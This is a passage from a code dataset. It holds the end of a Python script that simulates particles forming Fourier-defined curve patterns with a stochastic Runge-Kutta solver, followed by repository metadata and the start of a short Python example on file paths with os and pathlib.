*theta(t - 15 *np.pi) + (194/13 *np.sin(t + 51/14) + 93/23 *np.sin(2 *t + 43/12) + 13/8 *np.sin(3 *t + 57/17) + 9/5 *np.sin(4 *t + 32/13) + 14050/21) *theta(15 *np.pi - t) *theta(t - 11 *np.pi) + (-19/18 *np.sin(1/11 - 16 *t) - 8/11 *np.sin(1/6 - 14 *t) - 13/11 *np.sin(1 - 7 *t) - 9/8 *np.sin(7/11 - 5 *t) - 148/9 *np.sin(1/7 - 2 *t) + 19/6 *np.sin(t + 37/8) + 625/11 *np.sin(3 *t + 8/5) + 241/24 *np.sin(4 *t + 1/6) + 16/17 *np.sin(6 *t + 7/5) + 95/47 *np.sin(8 *t + 1/4) + 20/9 *np.sin(9 *t + 12/7) + 11/5 *np.sin(10 *t + 1/4) + 3/7 *np.sin(11 *t + 2/3) + 9/19 *np.sin(12 *t + 28/9) + 3/5 *np.sin(13 *t + 25/6) + 2/11 *np.sin(15 *t + 13/9) + 1/3 *np.sin(17 *t + 1/6) + 3925/7) *theta(11 *np.pi - t) *theta(t - 7 *np.pi) + (-31/12 *np.sin(11/12 - 6 *t) - 244/9 *np.sin(15/11 - 4 *t) - 186/5 *np.sin(7/6 - 2 *t) + 911/26 *np.sin(t + 74/21) + 317/7 *np.sin(3 *t + 1/3) + 28/9 *np.sin(5 *t + 52/15) + 33/17 *np.sin(7 *t + 12/5) + 7/10 *np.sin(8 *t + 13/7) + 6/7 *np.sin(9 *t + 9/5) + 6/7 *np.sin(10 *t + 11/4) + 13/5 *np.sin(11 *t + 4/7) + 2721/8) *theta(7 *np.pi - t) *theta(t - 3 *np.pi) + (-10/7 *np.sin(14/9 - 12 *t) - 11/7 *np.sin(7/9 - 11 *t) - 51/19 *np.sin(3/2 - 4 *t) - 89/4 *np.sin(18/13 - 3 *t) - 81/10 *np.sin(12/25 - 2 *t) + 2029/8 *np.sin(t + 3/2) + 3 *np.sin(5 *t + 3/5) + 23/15 *np.sin(6 *t + 29/10) + 74/15 *np.sin(7 *t + 51/25) + 10/11 *np.sin(8 *t + 32/21) + 13/6 *np.sin(9 *t + 8/5) + 2/7 *np.sin(10 *t + 16/7) + 4407/10) *theta(3 *np.pi - t) *theta(t +np.pi)) *theta(np.sin(t/2))
Y = ((41/2 *np.sin(t + 61/13) + 163/18 *np.sin(2 *t + 14/3) + 1/2 *np.sin(3 *t + 41/9) + 3802/5) *theta(91 *np.pi - t) *theta(t - 87 *np.pi) + (-12/7 *np.sin(7/5 - 17 *t) - 41/11 *np.sin(11/7 - 9 *t) - 3/7 *np.sin(11/8 - 4 *t) + 1175/14 *np.sin(t + 47/10) + 9961/40 *np.sin(2 *t + 33/7) + 555/8 *np.sin(3 *t + 11/7) + 39/5 *np.sin(5 *t + 14/9) + 11/5 *np.sin(6 *t + 3/2) + 25/2 *np.sin(7 *t + 47/10) + 155/12 *np.sin(8 *t + 14/9) + 33/10 *np.sin(10 *t + 19/12) + 14/5 *np.sin(11 *t + 51/11) + 64/7 *np.sin(12 *t + 14/3) + 45/7 *np.sin(13 *t + 11/7) + 1/14 *np.sin(14 *t + 49/13) + 1/2 *np.sin(15 *t + 16/13) + 76/25 *np.sin(16 *t + 19/12) + 23/5 *np.sin(18 *t + 26/17) + 191/38 *np.sin(19 *t + 47/10) + 47/13 *np.sin(20 *t + 23/15) + 62/9 *np.sin(21 *t + 33/7) + 31/9 *np.sin(22 *t + 37/25) + 31/4 *np.sin(23 *t + 16/11) + 18/7 *np.sin(24 *t + 4/3) + 91/15 *np.sin(25 *t + 3/2) + 29/7 *np.sin(26 *t + 14/3) + 49/25 *np.sin(27 *t + 47/10) + 9/4 *np.sin(28 *t + 23/5) + 57/56 *np.sin(29 *t + 6/5) + 83/10 *np.sin(30 *t + 16/11) + 18532/29) *theta(87 *np.pi - t) *theta(t - 83 *np.pi) + (-9/7 *np.sin(4/3 - 25 *t) - 106/11 *np.sin(16/11 - 22 *t) - 11/3 *np.sin(17/11 - 11 *t) - 1/17 *np.sin(1/16 - 9 *t) - 2/9 *np.sin(3/2 - 8 *t) - 2/9 *np.sin(11/9 - 6 *t) + 38/39 *np.sin(t + 14/3) + 9/5 *np.sin(2 *t + 61/13) + 19/7 *np.sin(3 *t + 8/5) + 22/5 *np.sin(4 *t + 33/7) + 8/11 *np.sin(5 *t + 3/2) + 95/94 *np.sin(7 *t + 14/9) + 25/13 *np.sin(10 *t + 13/8) + 3/5 *np.sin(12 *t + 14/3) + 2/11 *np.sin(13 *t + 17/4) + 35/11 *np.sin(14 *t + 14/3) + 17/5 *np.sin(15 *t + 51/11) + 84/13 *np.sin(16 *t + 89/19) + 51/8 *np.sin(17 *t + 51/11) + 5/8 *np.sin(18 *t + 17/5) + 35/6 *np.sin(19 *t + 61/13) + 11/9 *np.sin(20 *t + 9/2) + 21/13 *np.sin(21 *t + 27/16) + 77/12 *np.sin(23 *t + 8/5) + 151/14 *np.sin(24 *t + 21/13) + 2152/7) *theta(83 *np.pi - t) *theta(t - 79 *np.pi) + (-14/11 *np.sin(20/13 - 7 *t) - 47/8 *np.sin(14/9 - 3 *t) - 388/7 *np.sin(11/7 - t) + 18/11 *np.sin(2 *t + 3/2) + 4/3 *np.sin(4 *t + 19/12) + 19/14 *np.sin(5 *t + 47/10) + 3/11 *np.sin(6 *t + 25/17) + 1/24 *np.sin(8 *t + 9/14) + 1/3 *np.sin(9 *t + 47/10) + 5435/13) *theta(79 *np.pi - t) *theta(t - 75 *np.pi) + (-5/2 *np.sin(14/9 - 5 *t) - 42/11 *np.sin(11/7 - 3 *t) - 237/19 *np.sin(11/7 - t) + 86/3 *np.sin(2 *t + 11/7) + 14/15 *np.sin(4 *t + 11/7) + 17/8 *np.sin(6 *t + 11/7) + 15/16 *np.sin(7 *t + 8/5) + 4683/10) *theta(75 *np.pi - t) *theta(t - 71 *np.pi) + (-5/7 *np.sin(14/9 - 13 *t) - 11/16 *np.sin(14/9 - 9 *t) - 13/6 *np.sin(11/7 - 5 *t) - 2/7 *np.sin(20/13 - 4 *t) - np.sin(11/7 - 3 *t) - 341/34 *np.sin(11/7 - t) + 5/3 *np.sin(2 *t + 11/7) + 19/8 *np.sin(6 *t + 19/12) + 1/11 *np.sin(7 *t + 55/12) + 7/6 *np.sin(8 *t + 19/12) + 3/8 *np.sin(10 *t + 11/7) + 1/10 *np.sin(11 *t + 5/3) + 1/2 *np.sin(12 *t + 19/12) + 7/10 *np.sin(14 *t + 8/5) + 469/2) *theta(71 *np.pi - t) *theta(t - 67 *np.pi) + (-3/10 *np.sin(14/9 - 8 *t) + 16/11 *np.sin(t + 75/16) + 63/2 *np.sin(2 *t + 11/7) + 5/7 *np.sin(3 *t + 8/5) + 2/3 *np.sin(4 *t + 13/8) + 1/33 *np.sin(5 *t + 9/2) + 23/7 *np.sin(6 *t + 11/7) + 1/29 *np.sin(7 *t + 14/3) + 1/5 *np.sin(9 *t + 61/13) + 3265/9) *theta(67 *np.pi - t) *theta(t - 63 *np.pi) + (-16/13 *np.sin(11/7 - 4 *t) - 59/12 *np.sin(11/7 - t) + 183/5 *np.sin(2 *t + 11/7) + 5/4 *np.sin(3 *t + 14/9) + 8/7 *np.sin(5 *t + 47/10) + 80/27 *np.sin(6 *t + 11/7) + 14/13 *np.sin(7 *t + 19/12) + 20/19 *np.sin(8 *t + 33/7) + 10934/29) *theta(63 *np.pi - t) *theta(t - 59 *np.pi) + (-7/9 *np.sin(29/19 - 15 *t) - 121/60 *np.sin(17/11 - 5 *t) - 742/11 *np.sin(11/7 - t) + 494/11 *np.sin(2 *t + 19/12) + 74/15 *np.sin(3 *t + 19/12) + 78/7 *np.sin(4 *t + 21/13) + 47/10 *np.sin(6 *t + 13/8) + 35/17 *np.sin(7 *t + 27/16) + 17/7 *np.sin(8 *t + 19/12) + 5/16 *np.sin(9 *t + 19/8) + 22/9 *np.sin(10 *t + 11/7) + 2/11 *np.sin(11 *t + 39/10) + 10/11 *np.sin(12 *t + 19/12) + 5/13 *np.sin(13 *t + 12/7) + 3/7 *np.sin(14 *t + 23/14) + 1/4 *np.sin(16 *t + 18/11) + 1/12 *np.sin(17 *t + 15/7) + 4470/11) *theta(59 *np.pi - t) *theta(t - 55 *np.pi) + (-2/9 *np.sin(17/11 - 21 *t) - 9/7 *np.sin(3/2 - 18 *t) - 3/10 *np.sin(22/15 - 17 *t) - 23/7 *np.sin(14/9 - 8 *t) + 18/11 *np.sin(t + 8/5) + 155/4 *np.sin(2 *t + 11/7) + 9/7 *np.sin(3 *t + 28/17) + 173/10 *np.sin(4 *t + 11/7) + 14/13 *np.sin(5 *t + 75/16) + 22/9 *np.sin(6 *t + 8/5) + 1/7 *np.sin(7 *t + 16/9) + 5/3 *np.sin(9 *t + 8/5) + 9/8 *np.sin(10 *t + 8/5) + 16/9 *np.sin(11 *t + 8/5) + 8/3 *np.sin(12 *t + 8/5) + 3/13 *np.sin(13 *t + 14/3) + 29/30 *np.sin(14 *t + 11/7) + 1/6 *np.sin(15 *t + 16/9) + 7/8 *np.sin(16 *t + 28/17) + 5/16 *np.sin(19 *t + 18/11) + 11/12 *np.sin(20 *t + 18/11) + 1/7 *np.sin(22 *t + 9/7) + 3262/11) *theta(55 *np.pi - t) *theta(t - 51 *np.pi) + (-7/8 *np.sin(17/11 - 18 *t) - 7/6 *np.sin(17/11 - 17 *t) - 3/10 *np.sin(23/15 - 15 *t) - 17/10 *np.sin(11/7 - 10 *t) - 24/7 *np.sin(14/9 - 9 *t) - 24/25 *np.sin(14/9 - 8 *t) - 40/11 *np.sin(11/7 - 7 *t) + 19/10 *np.sin(t + 33/7) + 39/7 *np.sin(2 *t + 11/7) + 162/19 *np.sin(3 *t + 11/7) + 123/8 *np.sin(4 *t + 11/7) + 33/7 *np.sin(5 *t + 11/7) + 77/9 *np.sin(6 *t + 11/7) + 21/22 *np.sin(11 *t + 8/5) + 9/17 *np.sin(12 *t + 21/13) + 31/12 *np.sin(13 *t + 19/12) + 1/20 *np.sin(14 *t + 23/5) + 5/14 *np.sin(16 *t + 8/5) + 16814/23) *theta(51 *np.pi - t) *theta(t - 47 *np.pi) + (-102/11 *np.sin(11/7 - t) + 29/7 *np.sin(2 *t + 33/7) + 27/10 *np.sin(3 *t + 19/12) + 17/7 *np.sin(4 *t + 47/10) + 2/11 *np.sin(5 *t + 13/7) + 37/14 *np.sin(6 *t + 47/10) + 1/13 *np.sin(7 *t + 85/21) + 51/26 *np.sin(8 *t + 47/10) + 5/6 *np.sin(9 *t + 8/5) + 3/5 *np.sin(10 *t + 47/10) + 8/13 *np.sin(11 *t + 8/5) + 9/13 *np.sin(12 *t + 47/10) + 1/10 *np.sin(13 *t + 53/12) + 9028/13) *theta(47 *np.pi - t) *theta(t - 43 *np.pi) + (-1/2 *np.sin(17/11 - 14 *t) - 15/11 *np.sin(14/9 - 10 *t) - 29/11 *np.sin(14/9 - 8 *t) - 29/9 *np.sin(14/9 - 6 *t) - 1/3 *np.sin(13/9 - 5 *t) - 108/13 *np.sin(14/9 - 4 *t) - 12/7 *np.sin(14/9 - t) + 4/13 *np.sin(2 *t + 8/5) + 15/11 *np.sin(3 *t + 11/7) + 7/6 *np.sin(7 *t + 11/7) + 1/15 *np.sin(9 *t + 5/4) + 1/9 *np.sin(11 *t + 16/11) + 1/10 *np.sin(12 *t + 12/7) + 3/8 *np.sin(13 *t + 8/5) + 5872/9) *theta(43 *np.pi - t) *theta(t - 39 *np.pi) + (-6/7 *np.sin(38/25 - 30 *t) - 6/5 *np.sin(1/21 - 28 *t) - 13/8 *np.sin(7/9 - 18 *t) + 275/3 *np.sin(t + 23/5) + 3929/11 *np.sin(2 *t + 14/3) + 219/4 *np.sin(3 *t + 27/16) + 421/11 *np.sin(4 *t + 47/10) + 101/6 *np.sin(5 *t + 26/17) + 242/9 *np.sin(6 *t + 4/3) + 153/13 *np.sin(7 *t + 1) + 73/6 *np.sin(8 *t + 5/4) + 65/9 *np.sin(9 *t + 13/11) + 47/14 *np.sin(10 *t + 9/7) + 51/11 *np.sin(11 *t + 25/6) + 25/7 *np.sin(12 *t + 17/13) + 13/2 *np.sin(13 *t + 9/8) + 40/17 *np.sin(14 *t + 16/17) + 36/7 *np.sin(15 *t + 46/47) + 2 *np.sin(16 *t + 2/7) + 52/21 *np.sin(17 *t + 10/7) + 55/12 *np.sin(19 *t + 6/5) + 17/8 *np.sin(20 *t + 1/3) + 17/6 *np.sin(21 *t + 58/57) + 37/12 *np.sin(22 *t + 35/8) + 3/4 *np.sin(23 *t + 12/13) + 28/13 *np.sin(24 *t + 4/5) + 37/19 *np.sin(25 *t + 19/5) + 7/10 *np.sin(26 *t + 55/13) + 89/14 *np.sin(27 *t + 7/8) + 15/7 *np.sin(29 *t + 23/6) + 7/11 *np.sin(31 *t + 11/14) + 8933/13) *theta(39 *np.pi - t) *theta(t - 35 *np.pi) + (-17/9 *np.sin(9/14 - 11 *t) - 4/3 *np.sin(1/5 - 8 *t) - 29/6 *np.sin(3/8 - 7 *t) + 13/8 *np.sin(t + 11/6) + 6/5 *np.sin(2 *t + 30/7) + 8/7 *np.sin(3 *t + 31/11) + 13/6 *np.sin(4 *t + 1/11) + 4/5 *np.sin(5 *t + 31/7) + 31/9 *np.sin(6 *t + 8/11) + 1/3 *np.sin(9 *t + 39/20) + 9/5 *np.sin(10 *t + 13/4) + 7555/14) *theta(35 *np.pi - t) *theta(t - 31 *np.pi) + (-11/10 *np.sin(10/9 - 8 *t) - 9/2 *np.sin(2/5 - 7 *t) - 18/11 *np.sin(10/11 - 3 *t) + 17/9 *np.sin(t + 32/7) + 6/5 *np.sin(2 *t + 38/13) + 19/14 *np.sin(4 *t + 28/9) + 13/9 *np.sin(5 *t + 3) + 15/4 *np.sin(6 *t + 3/4) + 60/17 *np.sin(9 *t + 1/14) + 10/9 *np.sin(10 *t + 5/4) + 13/7 *np.sin(11 *t + 30/13) + 9899/18) *theta(31 *np.pi - t) *theta(t - 27 *np.pi) + (-2/11 *np.sin(2/9 - 5 *t) + 110/7 *np.sin(t + 35/12) + 16/9 *np.sin(2 *t + 68/15) + 3/14 *np.sin(3 *t + 36/13) + 1/2 *np.sin(4 *t + 7/2) + 1/7 *np.sin(6 *t + 45/13) + 2682/5) *theta(27 *np.pi - t) *theta(t - 23 *np.pi) + (157/9 *np.sin(t + 69/34) + 19/3 *np.sin(2 *t + 20/7) + 2169/4) *theta(23 *np.pi - t) *theta(t - 19 *np.pi) + (-3/2 *np.sin(3/13 - 7 *t) - 13/4 *np.sin(11/12 - 4 *t) - 131/7 *np.sin(5/4 - 2 *t) + 370/7 *np.sin(t + 74/17) + 31/3 *np.sin(3 *t + 47/16) + 11/4 *np.sin(5 *t + 50/11) + 43/11 *np.sin(6 *t + 19/7) + 23/14 *np.sin(8 *t + 33/10) + 3/5 *np.sin(9 *t + 21/11) + 1/10 *np.sin(10 *t + 1/16) + 1/3 *np.sin(11 *t + 62/25) + 5541/11) *theta(19 *np.pi - t) *theta(t - 15 *np.pi) + (171/4 *np.sin(t + 37/8) + 7/9 *np.sin(2 *t + 18/13) + 41/10 *np.sin(3 *t + 40/9) + 6/11 *np.sin(4 *t + 15/11) + 5012/11) *theta(15 *np.pi - t) *theta(t - 11 *np.pi) + (-12/13 *np.sin(7/5 - 12 *t) - 13/8 *np.sin(13/11 - 10 *t) + 43/12 *np.sin(t + 7/9) + 279/35 *np.sin(2 *t + 9/2) + 201/14 *np.sin(3 *t + 2/9) + 23/9 *np.sin(4 *t + 8/7) + 64/9 *np.sin(5 *t + 14/5) + 83/6 *np.sin(6 *t + 14/3) + 103/17 *np.sin(7 *t + 13/4) + 36/13 *np.sin(8 *t + 46/11) + 22/7 *np.sin(9 *t + 2/7) + 8/9 *np.sin(11 *t + 11/4) + 20/11 *np.sin(13 *t + 74/25) + 5/7 *np.sin(14 *t + 42/13) + 7/9 *np.sin(15 *t + 4/7) + 9/11 *np.sin(16 *t + 17/4) + 7/12 *np.sin(17 *t + 36/11) + 3437/6) *theta(11 *np.pi - t) *theta(t - 7 *np.pi) + (-22/7 *np.sin(7/9 - 9 *t) - 36/7 *np.sin(1 - 5 *t) - 181/26 *np.sin(6/5 - 3 *t) + 28/9 *np.sin(t + 5/6) + 131/22 *np.sin(2 *t + 26/7) + 127/13 *np.sin(4 *t + 23/5) + 21/4 *np.sin(6 *t + 1/10) + 40/3 *np.sin(7 *t + 22/23) + 88/13 *np.sin(8 *t + 23/5) + 115/38 *np.sin(10 *t + 3/7) + 11/9 *np.sin(11 *t + 11/8) + 8493/14) *theta(7 *np.pi - t) *theta(t - 3 *np.pi) + (-8/7 *np.sin(16/13 - 10 *t) - 23/10 *np.sin(4/3 - 7 *t) - 3961/12 *np.sin(1/19 - t) + 55/3 *np.sin(2 *t + 13/11) + 9/17 *np.sin(3 *t + 31/13) + 81/7 *np.sin(4 *t + 9/2) + 113/17 *np.sin(5 *t + 13/4) + 40/9 *np.sin(6 *t + 12/11) + 24/23 *np.sin(8 *t + 53/21) + 19/8 *np.sin(9 *t + 3/7) + 3/13 *np.sin(11 *t + 18/5) + 45/44 *np.sin(12 *t + 5/7) + 6798/13) *theta(3 *np.pi - t) *theta(t +np.pi)) *theta(np.sin(t/2))
else :
print("error : there is not such curve name")
quit()
Target = np.array([X,Y]).T
if jump==1:
Jcheck0=np.zeros(num)
for i in range(num-1) :
Jcheck0[i]=np .count_nonzero(Target[i+1:] == Target[i])
Jcheck1= Target[:] != [[0,0]]
Jcheck = np.logical_and(Jcheck0[:]==0,Jcheck1[:,0])
Target=Target[Jcheck]
t=np.linspace(0,dom,Jcheck.sum(),endpoint=False)
print(Jcheck.sum())
return Target,t
def setPVinit(setting) :
global Pinit, Vinit
global Xbmean, Vimean
if setting==0:
Pinitlen=int((np.max(Z)-np.min(Z)))
# Pinitlen=20
coeff=0.25
# coeff=0.5
# coeff=1.25
P_range=Pinitlen*coeff
print("P_range = %f" %P_range)
Pinit=np.random.rand(N,2)*P_range-P_range/2
Pinit-=np.array(np.mean(Pinit[:],axis=0))
Pinit+=np.array(np.mean(Z[:],axis=0))
v_range=50
v_s=np.random.randint(-10,10,size=2)
v_s=np.array([0,0])
print("v_s = %.1f,%.1f" %(v_s[0],v_s[1]))
Vinit=(np.random.rand(N,2)*v_range)-v_range/2 + v_s #np.array끼리 그냥 곱하면 component 사이의 곱
Vimean=np.array(np.mean(Vinit[:],axis=0))
Vinit-=Vimean
else :
print(os.getcwd())
Pinit_df=pd.read_csv('./Pinit_%s.csv' %set_name,delimiter='\t')
Vinit_df=pd.read_csv('./Vinit_%s.csv' %set_name,delimiter='\t')
Pinit=Pinit_df.to_numpy()
Vinit=Vinit_df.to_numpy()
print(Pinit.shape)
Xbimean=np.array(np.mean(Pinit[:]-Z[:],axis=0))
print("\nbarX_i mean={}".format(Xbimean))
Vimean=np.array(np.mean(Vinit[:],axis=0))
print("\nVimean={}".format(Vimean))
def set_dBcum(setting) :
global dBcum
dBcum=np.zeros((Trial+1,2,T))
if setting == 0 :
dBcum[1:,0,:]=np.random.normal(0,np.sqrt(h),(Trial,T))
dBcum[1:,1,:]=np.random.randint(0,1,(Trial,T))*2-1
else :
dBcum_df=pd.read_csv('./dBcum.csv',delimiter='\t')
dBcum_np=dBcum_df.to_numpy()
dBcum=dBcum_np.reshape(-1,2,T)
def settings(set_name) :
global N
global alpha, beta, psLB, phLB
global K, M, L, T
global curvetype,nettype, h
global PVinitset, dBset
if set_name=='ein' :
##ein set
N=500
alpha=0.25
beta=alpha
psLB=0.3
phLB=0.1
K=0.5
M=7
L=0.00001 #L=sigma
T=400 #T : number of steps for solving the DE
T=180
curvetype=3
# nettype=[0,0,0]
nettype=[3,1,0]
nettype=[4,4,0]
# nettype=[4,3,0]
PVinitset=1 #whether making or loading the initial data of P,V
h=0.025/2 #h=\Delta t ~ dt
dBset=0
elif set_name=='pi' :
##pi set
N=30
alpha=0.25
beta=alpha
psLB=0.31
phLB=0.1
K=5
M=7
L=0.001 #L=sigma
T=400 #T : number of steps for solving the DE
T=1400
curvetype=1
# nettype=[0,0,0]
nettype=[3,1,0]
# nettype=[4,3,0]
PVinitset=1 #whether making or loading the initial data of P,V
h=0.025 #h=\Delta t ~ dt
dBset=0
# cut=100
def make_variables():
global P, V
global Pdiff, Vnrmi, Xbave, Xbnrmi, phEi
P=np.array([Pinit])
V=np.array([Vinit])
print(P[0])
print(V[0])
print(Vimean)
## Vnrm(t) = Vnrm = sum_i |v_t^i|^2
s=np.power(Vinit[:,0],2)+np.power(Vinit[:,1],2)
Vnrmi=np.sum(s)-N*np.sum(np.power(Vimean,2))
## Xbnrm(t) = sum_i |x*_i-x*_ave|^2 = \sum_{i} |\bar{x}_t^i-\bar{x}_t^ave|^2
Xbave=np.sum(Pinit,axis=0)-np.sum(Z,axis=0)
Xbnrmi=np.sum(np.power(Pinit[:,0]-Z[:,0]-Xbave[0],2)+np.power(Pinit[:,1]-Z[:,1]-Xbave[1],2))
##phE(t)=\sum_{i,j\in\calE} \int_0^|\bar{x}_t^{ij}|^2 \phi(r)dr
phEi=0
for i in range(N):
J = A_ph[i,:]==1
ssq=(np.power(P[0,i,0]-Z[i,0]-P[0,:,0]+Z[:,0],2)+np.power(P[0,i,1]-Z[i,1]-P[0,:,1]+Z[:,1],2))[J]
phEi+=np.sum(phiEest(ssq,beta,phLB))
phEi*=M/2
if __name__ == '__main__':
version=2.00
##inputs and settings
set_name='pi'
test_name='test'
settings(set_name)
Trial=5
cut=10
dataset=0 #whether making or loading the solutions of DE
##Setting target pattern. /curvetype
#jump==1 then the "curve" is disconnected
if curvetype==0:
curvename='circle'
domain=2*np.pi
jump=0
elif curvetype==1:
curvename='pi'
domain=2*np.pi
jump=0
elif curvetype==2:
curvename='b.simpson'
domain=72*np.pi
jump=1
elif curvetype==3:
curvename='einstein'
domain=92*np.pi
jump=1
Z,Domain=Curve(domain) #Set Z as given curve
# A : adjacency matrix / nettype
zeta=['ps','ph','b']
for ind in range(3):
A=makenet(nettype[ind])
globals()['A_{}'.format(zeta[ind])]=np.copy(A)
print(A_ps)
##Setting a initial data of P,V / PVinitset
# P : positions, V : velocity. i.e. P=\bx, V=\bv
setPVinit(PVinitset)
## Making variables : P, V, and Pdiff, Vnrm, nV, Xbnrm, phE, calH
make_variables()
#이렇게 계속 append 하는 방식 말고 cum 미리 array 만들어 놓는게 빠른지 함 확인 해봐야 + 공간 어떤 방식이 더 많이 확보 가능한가
#-> 속도는 큰 차이 없고 오히려 append하는게 더 빠른 것 같아서 당황
Pcum=np.array([np.zeros((T,N,2))])
Vcum=np.array([np.zeros((T,N,2))])
nVcum=np.array([np.zeros((T,N,2))])
Vnrmcum=np.array([np.zeros(T)])
phEcum=np.array([np.zeros(T)])
Xbnrmcum=np.array([np.zeros(T)])
#dBcum : saving values of dBt
set_dBcum(dBset)
#지금 수정하기 귀찮다고 대충 했더니 cum ndarray들은 [0]=0 이고 [1]부터 가ㅄ이들어가는 상황
## Main part
if dataset==0:
for trial in range (0,Trial):
P=np.zeros((T,N,2))
V=np.zeros((T,N,2))
Vnrm=np.zeros(T)
Xbnrm=np.zeros(T)
phE=np.zeros(T)
P[0]=np.array([Pinit])
V[0]=np.array([Vinit])
Vnrm[0]=Vnrmi
Xbnrm[0]=Xbnrmi
phE[0]=phEi
## Solving DE for each trial
for t in range(1,T):
# print ("start %dth loop" %t)
Pnow=np.copy(P[t-1])
Vnow=np.copy(V[t-1])
## Stochastic Runge Kutta.
## calculating P[t], V[t]
## P,V_t = P,V_t-1 + (K_1 /2 +K_2 /2)
## K_1 = h * csmpf (P,V_t-1)+ (dBt-1-S*sqrt(h)) * Br(P,V_t-1)
## K_2 = h * csmpf (P,V_t-1 + K_1)+ (dBt-1+S*sqrt(h)) * Br(P,V_t-1 + K_1)
## https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_method_(SDE)
dBt=dBcum[trial+1,0,t]
S=dBcum[trial+1,1,t]
K_1=np.array([Vnow,csmpf(Pnow,Vnow)])*h+np.array([np.zeros((N,2)),(dBt-S*np.sqrt(h))*brown(Vnow)])
K_2=np.array([Vnow+K_1[1],csmpf(Pnow+K_1[0],Vnow+K_1[1])])*h+np.array([np.zeros((N,2)),(dBt+S*np.sqrt(h))*brown(Vnow+K_1[1])])
Pnext=np.copy(Pnow)
Vnext=np.copy(Vnow)
Pnext+=(K_1[0]+K_2[0])/2
Vnext+=(K_1[1]+K_2[1])/2
Pnext=np.nan_to_num(Pnext)
Vnext=np.nan_to_num(Vnext)
## appending P,V, dB
P[t]=np.array([Pnext])
V[t]=np.array([Vnext])
## calculating and appending Vnrm, Xbnrm, phE
s=np.power(Vnext[:,0],2)+np.power(Vnext[:,1],2)
Vmean=np.array(np.mean(Vnext[:],axis=0))
Vnrm[t]=np.sum(s)-N*np.sum(np.power(Vmean,2))
Xbmean=np.array(np.mean(Pnext[:]-Z[:],axis=0))
Xbnrm[t]=np.sum(np.power(Pnext[:,0]-Z[:,0]-Xbmean[0],2)+np.power(Pnext[:,1]-Z[:,1]-Xbmean[1],2))
for i in range(N):
J = A_ph[i,:]==1
ssq=(np.power(P[t,i,0]-Z[i,0]-P[t,:,0]+Z[:,0],2)+np.power(P[t,i,1]-Z[i,1]-P[t,:,1]+Z[:,1],2))[J]
phE[t]+=np.sum(phiEest(ssq,beta,phLB))
phE[t]*=M/2
##appending to cumulative data array
Pcum=np.append(Pcum,np.array([P]),axis=0)
Vcum=np.append(Vcum,np.array([V]),axis=0)
Vnrmcum=np.append(Vnrmcum,np.array([Vnrm]),axis=0)
Xbnrmcum=np.append(Xbnrmcum,np.array([Xbnrm]),axis=0)
phEcum=np.append(phEcum,np.array([phE]),axis=0)
if trial % 10 ==0 :
print("end %d" %trial)
elif dataset==1:
## loading data
## Pcum, Vcum, Vnrmcum, Xbnrmcum, phEcum
print(os.getcwd())
Pcum_df=pd.read_csv('./Pcum.csv',delimiter='\t')
Vcum_df=pd.read_csv('./Vcum.csv',delimiter='\t')
Vnrmcum_df=pd.read_csv('./Vnrmcum.csv',delimiter='\t')
Xbnrmcum_df=pd.read_csv('./Xbnrmcum.csv',delimiter='\t')
phEcum_df=pd.read_csv('./phEcum.csv',delimiter='\t')
Pcum_np=Pcum_df.to_numpy()
Vcum_np=Vcum_df.to_numpy()
Vnrmcum=Vnrmcum_df.to_numpy()
Xbnrmcum=Xbnrmcum_df.to_numpy()
phEnrmcum=phEcum_df.to_numpy()
Pcum=Pcum_np.reshape(-1,T,N,2)
Vcum=Vcum_np.reshape(-1,T,N,2)
print(Pinit.shape)
print ("End\n")
medVnrm=np.median(Vnrmcum[1:],axis=0)
stdVnrm=np.std(Vnrmcum[1:],axis=0)
##Outlier detection
##find appropriate constant 'cut'
## that the number of trials which is further than 'cut' * std from median
## is larger than 1% but not too large
select=0
while select==0:
checkI= Vnrmcum-medVnrm > cut*stdVnrm
selcount = np.sum(checkI,axis=1)
selI = selcount > 0
print ('cut:%.2f select:%d' %(cut,np.sum(selI)))
if np.sum(selI)<=Trial*0.01 :
cut-=0.25
else :
select=1
print('select average')
print(np.mean(selcount))
break
##Plotting and saving plot
# plotsave=(input("Do you want to save? Yes=else, No=0 "))
plotsave=1
makeplot()
#파일 저장은 어떻게 할지. 데이터 P,V,nV : Trial*T*N*2 / Vnrm, Xsnrm, dB : Trial*T
#전자 : numpy를 썼을때 data모양 재조합하기 쉬운 방식으로 모양을 바꿔주면 될 듯.
##Saving data
# if savemode==1 then save only chosen data(i.e. outliers),
# elif savemode==2 then save all data
save_mode=2
savedata(save_mode)
print("DONE")
# 중간에 물결선 넣기
# https://matplotlib.org/3.1.0/gallery/subplots_axes_and_figures/broken_axis.html 물결선 넣기 -> 결국 그래프를 두개로 쪼개야함
# https://matplotlib.org/3.1.0/tutorials/intermediate/gridspec.html ->그래프를 격자 위에 임의로 배치할 수 있음. 조각보처럼
# https://stackoverflow.com/questions/53642861/broken-axis-slash-marks-inside-bar-chart-in-matplotlib
# %%
| 72.850467 | 10,027 | 0.536598 | 15,597 | 70,155 | 2.377188 | 0.073604 | 0.156836 | 0.013755 | 0.011517 | 0.441648 | 0.308089 | 0.241794 | 0.211775 | 0.200637 | 0.186153 | 0 | 0.22183 | 0.20861 | 70,155 | 962 | 10,028 | 72.926195 | 0.445983 | 0.106678 | 0 | 0.164486 | 0 | 0 | 0.019752 | 0.002835 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031776 | false | 0 | 0.031776 | 0.001869 | 0.082243 | 0.054206 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6ad8a755033ecac454450a7695caf96f0b658d20 | 478 | py | Python | codigo/Live199/exemplo_01.py | z4r4tu5tr4/live-de-quarta | 1d12adb83f2afe306faf52e47edacef714c50574 | [
"MIT"
] | 2 | 2017-06-05T23:32:00.000Z | 2017-06-08T01:01:35.000Z | codigo/Live199/exemplo_01.py | z4r4tu5tr4/live-de-quarta | 1d12adb83f2afe306faf52e47edacef714c50574 | [
"MIT"
] | null | null | null | codigo/Live199/exemplo_01.py | z4r4tu5tr4/live-de-quarta | 1d12adb83f2afe306faf52e47edacef714c50574 | [
"MIT"
] | null | null | null | import os
if os.name == 'nt':
filename = r'\\files\\pasta_0\\arquivo_1.txt'
else:
filename = 'files/pasta_0/arquivo_1.txt'
with open(filename) as file:
print(file.read())
from pathlib import Path
path_atual = Path()
pasta_0 = path_atual / 'files' / 'pasta_0'
